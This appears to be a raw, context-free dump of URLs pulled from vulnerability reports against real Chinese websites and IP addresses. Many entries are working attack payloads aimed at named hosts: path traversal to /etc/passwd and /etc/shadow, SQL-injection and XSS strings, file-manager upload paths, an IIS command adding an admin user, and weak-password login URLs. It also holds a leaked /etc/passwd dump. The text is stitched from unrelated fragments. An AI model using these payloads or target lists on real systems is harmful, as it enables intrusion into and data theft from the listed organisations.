http://218.92.205.170/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://113.108.217.131/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://113.108.217.131/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://60.209.94.94/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://61.143.225.199/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://61.143.225.199/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://61.143.225.199/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://61.143.225.199/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://218.65.61.122/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://218.65.61.122/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://211.103.234.102/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://211.103.234.102/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://222.215.119.3/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://222.215.119.3/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://222.215.119.3/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://222.215.119.3/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://114.251.242.141/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://114.251.242.141/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://114.251.242.141/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://114.251.242.141/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://58.61.29.25/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://58.61.29.25/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://58.61.29.25/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://58.61.29.25/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://202.114.35.30/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://202.114.35.30/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://202.114.35.30/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://58.248.14.30/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://125.88.37.206/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://125.88.37.206/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://125.88.37.206/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://125.88.37.206/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://58.248.14.30/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://221.123.142.232/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://221.123.142.232/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://221.123.142.232/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://210.76.65.145/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://218.25.155.38/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://124.207.46.68/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://124.207.46.68/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://202.199.112.6/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://124.205.110.180/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://124.205.110.180/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://219.144.130.184/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://219.144.130.184/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://219.144.130.184/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://114.80.204.38/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://114.80.204.38/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://m.huxiu.com/add_user_post_comment http://www.wandafilm.com/baseInfo/news/news.do?cate_id=900&items_per_page=1&m=ajaxServiceList&rond=0.5514420296531171&&showIndex=1 http://www.wandafilm.com/setCity.do?code=8022251040&m=film_info_init_next&reqUrl=http://www.wooyun.org https://www.dhc.net.cn/info/Qrealreport_detail.jsp?q10_id=5 http://220.168.30.69:8080/webmail/admin/index.php http://220.168.30.69:6011/collectdata/ http://220.168.30.69:6020/hnkj/wb/space/IndexAction.do?method=index http://www.acpaa.cn/的搜索处。 www.acpaa.cn http://www.acpaa.cn http://wooyun.org/bugs/wooyun-2014-053145 http://www.js.chinaunicom.com/shop/template/shop/order_query.shtml http://www.js.chinaunicom.com/shop/shop/order/ShopOrderQuery.do http://183.56.130.180:9003/isp/ent/registerviewByPro?pc=01030000 http://219.142.42.17:8010/ESCM/account/login.do http://219.142.42.17:8010/ESCM/provider/toProviderSelect.do http://219.142.42.17:8010 http://www.wh12333.gov.cn/)几个应用系统存在weblogic控制台弱口令: https://221.232.64.242:7022/grws/login.jsp https://221.232.64.242:7022/console https://221.232.64.242:7002/dwws/login.jsp https://221.232.64.242:7002/console https://221.232.64.242:7012/sqws/login.jsp https://221.232.64.242:7012/console http://www.sanfu.com/?mod=faq&do=agreement&action=agreement&sid=a05eeebf274a415a4096d3e279e9395e http://www.sanfu.com/?mod=faq&do=agreement&action=agreement&sid=a05eeebf274a415a4096d3e279e9395e http://www.mhxx.renren.com/plus/flink_add.php inurl:News_Detail.asp?News_BigClass_ID http://www.coca-cola.com.cn/admin/user/login.aspx http://218.57.170.91:8080/ http://218.57.170.91:8080/adduser.asp http://218.57.170.91:8080/modify.asp http://218.57.170.91:8080/view.asp?dd=69701 http://192.***.**.60/uniteservice/ http://192.***.**.60/wwwdata/ http://192.***.**./iAgent/ HTTP://192.***.**.60/LocalInfoData/ http://www1.gdufs.edu.cn/gwyjs/yjsc/admin/admin_login.php?action=logout http://vote.weibo.com/index/getByType http://vote.weibo.com/index/getByType http://cpc-gov.cn/ http://cpc-gov.cn/a/a/a.asp http://61.156.14.159:8088/newmapware/Main.aspx http://219.133.34.198:8080/ http://183.60.143.160:8086/ http://211.162.125.200:8080/ http://gpsweb.hn-dg.cn:8086/ http://59.39.182.131:81/ http://www.anxgps.com:6000/ http://ffyj.bgpintl.com/Web/home.aspx http://ffyj.bgpintl.com/upload/upload.aspx http://gz.189.cn/service/pay/pay_charge/ifr_balance_short.jsp data:text/html;base64,PHNjcmlwdD5hbGVydCgieHNzIik8L3NjcmlwdD4= http://vosuat.sf-express.com/index.php?m=content&c=index&a=lists&catid=6 http://admin.loupan99.com/login.aspx http://act2.aion.sdo.com/aion5th/Server/Data/Aion5th_ActionArea26_Code.server.ashx?method=add&Code=注入风险 site:www.hnrpc.com http://www.hnrpc.com:85/zsb/zcfg_view.asp?id=72 www.loufeng.gov.cn/news_show.php?id=7070 http://www.zh8888.com/admin/index.php http://ats.lenovo.com.cn/ http://wbm.whu.edu.cn/admin/login.php http://obama.freecomm.cn/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00 http://211.151.82.56:8080/pbx/device http://jobs.shanghaitech.edu.cn/job.asp?id=48 VERSION:1.2.2 http://config.baofeng.com/ http://www.wuhanmsa.gov.cn/message.aspx?id= http://wbm.whu.edu.cn/jcnr.php?mid=18&sid=9&id=958&tag=2 http://www.ctsat.cn/ http://www.ctsat.cn/Html/viewHtml/viewHtml.aspx?htmlLv=7&htmlType=YeWu http://www.ctsat.cn/Html/viewHtml/XinWenList.aspx?htmlLv=3&htmlType=-1 http://www.ctsat.cn/Html/viewHtml/listViewHtml.aspx?ID=c1bb6337-964f-498a-8f78-e9b94ece1b63 http://office.189.cn/login.jsp http://office.189.cn/sysPwdQuestion!check.do http://119.134.83.94/,无线ap弱口令登陆,可以控制该ap http://118.180.8.71/login.jsp http://118.180.8.71/examples/cal2.jsp http://bk.11185.cn/order/mynameaddrbook.do?method=findMynameaddrbookmain http://bk.11185.cn http://guest.lenovo.com.cn http://guest.lenovo.com.cn/api/index/search.php?debug=true&search=1 http://www.0543tuangou.com/ site:g.xunlei.com inurl:profile http://luyou.xunlei.com/space-uid-5643.html http://119.188.128.110 http://103.15.200.110 http://www.juniper.net/support/downloads/ www.juniper.net下载 http://www.hotel.hc360.com/hotel.zip http://m.tiantian.com/m.tiantian.com.rar http://m.tiantian.com/login/login.rar http://www.bksms.sdu.edu.cn/ http://plan.nju.gov.cn/Jingdian_Info2.aspx?id= http://plan.nju.gov.cn/ExistedStaticLine_Info.aspx?id= http://plan.nju.gov.cn/GHandler.ashx?type=Jingdian&name= http://plan.nju.gov.cn/admin/Shell/index.aspx http://sms.nju.gov.cn/login.html http://pldltjw.net/login.aspx http://pldltjw.net/index.aspx,如下图所示: http://www.zoomla.cn/Class_30/NodeNews_1.aspx?n= http://sfj.yueyang.gov.cn/open.php?typeid=45 http://119.188.128.223 http://103.15.200.223 http://www.aeromexico.cc/aeromexico.rar http://xss.xxx/ http://hysz.nju.edu.cn:7000/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3 http://59.108.229.254:8088/user/gotoLoginPage.action http://59.108.229.254:8088/user/gotoLoginPage.action?class['classLoader'].resources.dirContext.docBase= http://yuntu.baidu.com/yuntu_manage/site/install http://www.yjxgtj.gov.cn/lm.php?typeid=14 http://house.focus.cn/common/modules/survey/survey_submit.php http://house.focus.cn/common/modules/survey/survey_submit.php http://www.ibreezer.com//fckeditor/editor/filemanager/connectors/test.html http://www.ibreezer.com:80/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.aspx http://www.ibreezer.com:80/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.php http://www.ibreezer.com:80/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/aspx/connector.aspxx http://www.ibreezer.com:80/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/aspx/connector.phpx http://www.ibreezer.com:80/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/php/connector.asp http://www.ibreezer.com:80/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/php/connector.aspx http://www.ibreezer.com:80/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/php/connector.php http://www.ibreezer.com:80/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp http://www.ibreezer.com:80/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.aspx http://www.ibreezer.com:80/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.php http://www.ibreezer.com:80/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp http://www.ibreezer.com:80/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/aspx/connector.aspx http://www.ibreezer.com:80/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.aspx http://www.ibreezer.com:80/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.php http://www.ibreezer.com:80/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector http://www.ibreezer.com:80/fckeditor/editor/filemanager/browser/default/frmupload.html http://www.ibreezer.com//UploadFiles/FckFiles/file/a_asp;a.jpg http://zabbix.53rj.com.cn/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28sessionid,0x7e,userid,0x7e,status%29%20as%20char%29,0x7e%29%29%20from%20zabbix.sessions%20where%20status=0%20and%20userid=1%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29 http://zabbix.53rj.com.cn/scripts.php打开是空白,猜测已被黑,并且黑客改了内容,不想再被其他人入侵 http://museum.ustb.edu.cn//data/mysql_error_trace.inc http://tongji.baidu.com/data/mobile/brand,找到最下面,有一个下载图片的功能,点击【下载图片】并抓包,可以得到以下请求。 http://tongji.baidu.com/data/mobile/chart/save http://www.w3.org/2000/svg\ xmlns:xlink=\"http://www.w3.org/1999/xlink\ http://db.178.com/wow/cn/hscards.html?rarity=1&search=1 http://www.heerit.com/dxanli.htm http://www.google.de/#filter=0&newwindow=1&q=inurl:/forget_password.jsp+%22%E8%AF%B7%E8%BE%93%E5%85%A5%E6%82%A8%E7%9A%84%E7%94%A8%E6%88%B7%E5%90%8D%22 https://www.google.co.in/search?ix=aca&sourceid=chrome&ie=UTF-8&q=%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%3A%E5%8C%97%E4%BA%AC%E5%B8%8C%E5%B0%94%E4%BF%A1%E6%81%AF%E6%8A%80%E6%9C%AF%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8 http://seecom.zte.com.cn http://mei.tiantian.com/pd41535.html GET:pd41535.html http://mei.tiantian.com/pd41535'and'1'='1.html http://mei.tiantian.com/pd41535'and'1'='2.html http://movie.douban.com/people/87875320/ http://www.ali213.net/vote2012/gamevote.asp http://m.sanfu.com/reg/forgetpw_step3.htm http://shop.letv.com/product/product-pid-GWGT501005.html www.mba.ynu.edu.cn/downs.jsp?url=/WEB-INF/web.xml www.edp.ynu.edu.cn/downs.jsp?url=/WEB-INF/web.xml www.mba.ynu.edu.cn/downs.jsp?url=/WEB-INF/web.xml www.evolution.ynu.edu.cn/web.rar www.job.ynu.edu.cn/wwwroot.rar https://www.google.com.hk/webhp?hl=zh-CN#hl=zh-CN&newwindow=1&q=inurl:truecms%2Fapp&safe=strict http://youth.muc.edu.cn/dede/login.php?gotopage=%2Fdede%2Findex.php url:eaptag2/pages/examples/demo/index.html http://gj.hn118114.cn http://59.50.113.197:1680 http://123.139.154.42:9080/ http://58.63.38.180:9080 http://360ants.com/relogin.jsp http://library.cup.edu.cn/index.html http://222.240.139.236:9080/eapsoa/AjaxAdapter http://www.183read.com/ http://www.sanfu.com/frame.php?frame=%E5%87%BA%E8%A http://xny.ctgu.edu.cn/EMS_Download.php?bid=23 http://stock.pingan.com/jijinchaoshi/jijinxinwen/jijinnewinfo.iface?id=447239135223 http://cdc.cma.gov.cn/yhzn.do?method=getContent&typeId=25 http://work.cnpostair.com/Items/Ver_Detail.aspx?ID=100220/FM9521 site:bbs.tuniu.com inurl:space http://data.jxteacher.com/search/ http://stock.pingan.com/jijinchaoshi/jijinxinwen/ji http://www.weimob.com/site/wenda?page=1&ids=1 http://www.weimob.com/site/wenda?page=1&ids=1 http://42.96.167.239/product!index.action?id=307526 http://42.96.167.239/product!index.action http://42.96.167.239/guige.jsp http://www.cpac.com.cn/ http://www.cpac.com.cn/manage/default.aspx http://www.cpac.com.cn/manage/default.aspx http://portal.****.edu.cn/eapdomain/static/component/cms/cmp_cms_pim_show/showInfoDetail.jsp?infoId=8387&config_id=6144选取随便一个新闻页面 http://job.352.com/hr/index1.jsp http://www.352.com/upimages/1398427286577.html http://www.352.com/upimages/1398426054115.html http://www.352.com/upimages/1398431329174.html https://register.352.com/login/findbackPassword_1.jsp?msg=%E6%B5%8B%E8%AF%95 http://english.352.com/manager/html http://www.tengcon.com/download/T9_Hardware_Manual_V01.201106.rar http://www.sanfu.com/?do=../../../../../../../../../../etc/passwd%00.jpg&id=6618&mod=goods http://www.sanfu.com/?do=display&id=6618&mod=../../../../../../../../../../etc/passwd%00.jpg http://cms.baa.bitautotech.com http://dag.whu.edu.cn/css.asp http://ndnews.imu.edu.cn/18da/dede/login.php?gotopage=%2F18da%2Fdede%2Findex.php http://222.240.168.145/PRTVUWeb/pages/common/frameset.jsp id:70072试试 http://www.sanfu.com/?mod=ucp&do=orderlist&action=close&order_id=70072 id:34847 http://www.sanfu.com//ajax.php?action=del_consignee&id=34847&_=1398447445017 http://yingxiao.baidu.com/blog/article/530.html http://jtj.nanhai.gov.cn:80/NHPORTALGIS/nhjt/JTService/LineMatch.asmx/GetLineSet http://210.45.204.8/ReadNews.asp?NewsID=638&BigClassName=%B2%CE%BF%BC%D7%C9%D1%AF&SmallClassName=%BF%C6%BC%BC%B2%E9%D0%C2&SpecialID=0 http://210.45.192.200/xljk/news_detail.asp?id=150 http://bbs.ganji.com/ http://111.75.255.55/szxx/Gongkai.aspx?xfid=3131128101751 http://jcy.jinhu.gov.cn/ http://jcy.jinhu.gov.cn/admin/admin_login.asp http://jcy.jinhu.gov.cn/11.asp http://m.jxteacher.com/bm/xg_login.aspx,参数txtCardId可被注入 http://www.bankkf.com/ http://iphone.10010.com/iphome.zip http://bbs.8264.com/forum.php?mod=viewthread&tid=2116822&extra= fuck4.asp/这个目录~~利用iis6.0解析直接就可以了~~ http://cpms.e-chinalife.com/xycms/xycms/ArtiSearch.do encap:Ethernet F4:CE:46:81:86:96 addr:10.24.81.6 Bcast:10.24.81.255 Mask:255.255.255.0 f6ce:46ff:fe81:8696/64 Scope:Link MTU:1500 packets:84558792 packets:81148393 txqueuelen:1000 http://117.79.131.147:8080/index.html http://vcaps.neu.edu.cn/adminLogin.action http://wap.baidu.com.cn/tc?src=ss-linkchain.com/OLDRLEOVJJA1JY http://jichu.neu.edu.cn:80/index.php?md=lanmu&msid=7&lid=6 http://sba.neu.edu.cn/neu/index/DeptInfo.asp?Dept_Id=17 http://406089362.blog.sohu.com/ http://www.jingwei.com/follow/followusers http://www.jingwei.com/follow/followusers http://www.jingwei.com/profile/?uid=-4039385&type=news&page=1&count=10 http://vip.club.sohu.com/xjlkp/list.php?tag=5%27+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%23 http://wenku.baidu.com/view/26359187bceb19e8b8f6bae0.html http://sxzz.qhu.edu.cn/admin888/login.php http://www.gzsrd.gov.cn/leaders/2013/list_3.html http://www.7898.biz/index.htm) http://www.365tkt.com/ http://www.365tkt.com/jnzz/ http://www.chinajob.com.cn/jobweb/newslist.asp?class=007 http://www.chinajob.com.cn/gjrc/news.asp?id=121 http://www.buffalo-china.com/products/product_details.php?id=206 http://www.ahong.com.cn/phpmyadmin/ http://www.ahong.com.cn/phpinfo.php http://116.228.55.9/ http://116.228.55.9:8081/1.zip http://116.228.55.9:8081/2.zip http://116.228.55.9:8081/3.zip http://116.228.55.9/111.zip http://www.cappse.org.cn/newscon.php?id=6&tid=100 http://www.haierpeople.cn http://www.chncla.com/chinese/download/Showdownload.asp?ID=958&ClassID=27 http://XXX.XXX.XXX.XXX/.../.../windows/system32/cmd.exe?/c+net+user+admin+admin+/add”加用户等 http://www.shodanhq.com/search?q=MS-MFC-HttpSvr%2F1.0++country%3ACN http://202.108.14.246/django/login/ http://202.108.14.246/php/ http://zwzx.gzwuchuan.gov.cn/application/ztxz/xzjj.jsp?type=81&departid=11 http://website.96533.com/default.asp,存在SQL盲注漏洞,可爆预约用户信息,包括车牌等,以及主站库: http://www.wscwh.baoying.gov.cn/index_map.action?departId=321203001 http://www.oice.uestc.edu.cn/list.php?id=20 http://it.11185.cn www.ccgp-jilin.gov.cn/cgzxdtdetail.jsp?tablename=cgnr&condition=176868&articleid=10000245009 http://www.hao123.com/topic/2014cz www.jljs.gov.cn/kfbweb/news.php?id=32 http://www.zdjj.gov.cn/ http://www.youjoy.net/ http://www.youjoy.net/admin/login.php http://111.13.55.55/webmanage/ http://111.13.55.55/webmanage/channelchild_add.jsp?from=2&id=22&pid=2&pname=%D3%CA%CF%E http://jk.e23.cn/nx/nx_manageLogin/    dede补丁未打 http://jk.e23.cn/help.php http://jk.e23.cn/php.php http://jiwei.hebau.edu.cn/list0.php?cid=1 http://mv.17186.cn/default.aspx http://meeting.352.com/marketing/sale_item.jsp?id=77 http://www.352.com/marketing/sale_item.jsp?id=737 http://english.352.com/marketing/sale_item.jsp?id=737 http://chatservice.352.com/login.jsp https://admin.352.com/system/logon.jsp http://www.352.com/member/security/name.jsp?msg=%22%29;alert%28document.cookie%29 https://login.352.com/logon/?j=http://www.baidu.com http://www.linekong.com www.linekong.com http://m.sanfu.com/countBuy.htm?cart.barcode=32815409&cart.number=NaN&goods.id=6567 http://www.cutecms.cn/ http://m.sanfu.com/reg/newCardPast.htm http://auto.163.com/special/2014cmpx/ http://vote.news.163.com/vote2/djsonpVote.do?voteid=30099&itemid=148814&callback=votePost, http://job.neu.edu.cn/Char.asp http://jdyxb.jlu.edu.cn/news.php?bid=1 http://www.hnpost.com/ http://www.hnpost.com/web.rar http://wsq.qq.com/reflow/follow?resType=json&isAjax=1&key=226216966 http://wsq.qq.com/reflow/follow?resType=json&isAjax=1&key=226216966 http://mq.wsq.qq.com/226216966/like?tId=11&resType=json&isAjax=1&_=1398405189497 http://985ap.xjtu.edu.cn/research.php?cid=3 https://202.113.WW.CC/vpnweb/index.php?para=index https://115.24.ZZ.SS/vpnweb/index.php?para=index https://202.113.WW.YY/vpnweb/index.php?para=index http://123.126.32.40:8080 http://220.181.184.125 http://vip.hn118114.cn/ProductL.aspx?T=生活日用 http://jk.hn118114.cn/app_web/index.php?m=home&c=product&id=1010 http://support.you.118114.cn/userCenter/user!login.do http://passport.weibo.com/存在任意URL跳转漏洞。 http://cms.kingdee.com/solutions/business/bi/biCaseList.jsp?columnId=156201301&pageNo=1 http://bbs.hc360.com/ http://bbs.hc360.com/thread-4402403-1-1.html http://wap.abchina.com/Portal/logon/Index.aspx http://3g.paybest.cn/abc_drawing.php?drawing=4 http://3g.paybest.cn/abc_drawing.php?drawing=4 http://www.jjbhyc.com/info.asp?channel=2&classid=2&id=393 https://vpn.jd.com/,输入一个不存在的用户,会提示“用户不存在”。 http://xny.ctgu.edu.cn/EMS_ShowNews.php?bid=8&sid=0&tid=0&fid=41&id=37 http://www.3dzph.com/j2.aspx http://www.3dzph.com/l.aspx site:china-sss.com inurl:custId http://mall.china-sss.com/member/action?custId=9C0201718096 http://www.jiusenscreen.com/aboutus-show.asp?id=120 http://www.jiusenscreen.com/chisiho_china_admin/Login.asp UvJP0:15861:0:99999:7 http://www.mrlee.com.cn/admin/admin_login.aspx http://www.mrlee.com.cn/CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config http://mobads.baidu.com/ad.html?url=%09%2F%2Fwww.wooyun.org http://hdgt.hd.gov.cn/down.asp?filename=../conn.asp%20 http://61.191.25.187/ http://gwy.psych.cn:80/gen-image?image=../../../../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin avahi-autoipd:x:170:170:Avahi Stack:/var/lib/avahi-autoipd:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin rtkit:x:499:497:RealtimeKit:/proc:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin saslauth:x:498:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin qpidd:x:497:496:Owner Daemons:/var/lib/qpidd:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin avahi:x:70:70:Avahi Stack:/var/run/avahi-daemon:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin pulse:x:496:495:PulseAudio Daemon:/var/run/pulse:/sbin/nologin gdm:x:42:42::/var/lib/gdm:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash tcpdump:x:72:72::/:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin web:x:500:500::/home/web:/bin/bash http://snsx.whu.edu.cn/下的图片库搜索处,为post注入。 http://snsx.whu.edu.cn http://dfi.bnuz.edu.cn/article.php?id=10 http://www.sanfu.com/?class_new=0&do=index_new&mod=goods&page=11&per_page=32&price=-1&style=sale http://www.sanfu.com/?class_new=0&do=index_new&mod=goods&page='&per_page=32&price=-1&style=sale http://nczx.yonyou.com/SubModule/ http://nczx.yonyou.com/SubModule/Role/ http://nczx.yonyou.com http://nczx.yonyou.com ftp://192.168.8.86 ftp://125.35.5.232 https://211.68.223.12/commonplugin/Download.php?licensefile=../../../../../../../../../../etc/shadow http://shhj.k-touch.cn/appfen/salelist.aspx http://shhj.k-touch.cn/appfen/deallist.aspx http://www.cugb.edu.cn/research/researchSumItemList.action?bigClassId=45 http://cwc.sitsh.edu.cn:8080/Index.aspx(主页) http://cwc.sitsh.edu.cn:8080/HomeDetails_Index.aspx?actionType=srule_item&actionID=57 http://yxzy.hrbmu.edu.cn:8080/cjxy/contentPage.php?news_id=301 http://www.xiaojukeji.com/db/ http://www.xiaojukeji.com/db/config.inc.php http://utsc.guet.edu.cn/search.aspx?key=1 http://mall.china-sss.com/member/action?custId=9C0201718096 http://mall.china-sss.com http://physics.njnu.edu.cn/reports.php?typeid=&page=2 http://physics.njnu.edu.cn http://www.czairport.com/search/order/my_RL/ZXLMyFlight.asp?OrderID=09120113113072存在注入漏洞和越权访问 http://gacfiatauto.hz.letv.com/ http://gacfiatauto.hz.letv.com/php/vogusernum.php?callback=jQuery171032845610193908215_1398744981011&tel=1&_=1398745012738 http://101.226.1.182:88/ http://oa.xun-ao.com/admin/user/user.post.php http://oa.xun-ao.com/admin/user/user_edit.php http://www.qingdaoagri.gov.cn/qd_agri_web/siteweb/wsbs/jsdh/download.jsp?path=C:windows/win.ini www.yanzhou.gov.cn/siteweb/wsbs/jsdh/download.jsp?path=C:windows/win.ini www.xintai.gov.cn/siteweb/wsbs/jsdh/download.jsp?path=C:windows/win.ini http://221.214.219.38/siteweb/wsbs/jsdh/download.jsp?path=C:windows/win.ini http://www.sdyt.gov.cn/siteweb/wsbs/jsdh/download.jsp?path=C:windows/win.ini https://目标域名/admin/fckeditor/_whatsnew.html http://zhaopin.juneyaoair.com:8081/Recurit/ANN.aspx?PK_ANN=2 http://www.e-plugger.com/右上角有个企业邮箱! http://www.594sgk.com/中找找e-plugger.com http://www.zgcrc.com.cn/aboutus/?id=17 http://vm-192-168-10-137.shengyun.grandcloud.cn/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.classloader%3Aid%3D"vfsfile%3A%2Fhome%2Fmichael%2Fliferay%2Fliferay-portal-6.0.6%2Fjboss-5.1.0%2Fserver%2Fdefault%2Fdeploy%2Fhdscanner-jboss-beans.xml http://zwzx.wuchang.gov.cn/new/web/blzn/bszn.jsp?departid=73751556x http://www.ccshbx.org.cn/menu.jsp?ccn100=0103&fileName=WEB-INF/classes/SqlMapConfig.properties&PageCount=1&queryForword=pre&select1=01 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192 http://www.jzauction.com.cn/xwjt.php?xx=1183 acm.tju.edu.cn/toj/contest/show_cerror.php?cid=1&id=249 http://lab.tjmu.edu.cn/lab/getFile.jsp http://lab.tjmu.edu.cn/lab/getFile.jsp?filename=../../index.jsp下载首页文件 http://lab.tjmu.edu.cn/lab/getFile.jsp?filename=../../getFile.jsp http://iaep.nau.edu.cn/news/downfile.asp?file=../admin/defaultpro.asp http://haozhoudao.qq.com/yaoqing.html?id=111_1(id换成假的了) http://sanfu.com.cn/order/orderInfo.htm?orderInfo.id=70071 http://bbs.wangjiu.com/uc_server/admin.php?a=login&m=user http://www.dzhm.org.cn/newssearch.php?KeyWord=11 http://218.200.201.184/masmanage/mas_page/system/index.jsp https://vpn.lib.tju.edu.cn https://221.213.45.231 https://202.113.20.208 https://202.113.49.100/ https://122.226.150.69 https://gljy.cn https://202.196.119.130 https://211.82.48.60/ http://oa.xun-ao.com/admin/project_money/add.post.php http://oa.xun-ao.com/admin/project_money/add.post.php http://oa.xun-ao.com/admin/project_money/add_money.php?id=1 http://bbs.jc.pptv.com/ http://mail.deppon.com/ http://m.deppon.com/logincheck http://mail.deppon.com/gps/RetakePassword.aspx http://www.ggdaxxw.gov.cn/newsym/opentext.php?articleid=1331 http://bsqy.gov.cn/newsList.php?ArticleID=396 http://www.secri.gov.cn/index.php?articleid=112&mod=brief http://www.shangzhi.gov.cn/content.php?id=28685 http://www.chinauto.gov.cn/article_dtl.php?id=3187 http://xxsser.duapp.com/VtK3HI?1398827830 http://redir.yy.duowan.com/redir.php?url=URL view-source:http://redir.yy.duowan.com/redir.php?url=URL%3C/script%3E http://qun.qzone.qq.com/group#!/1150195/share 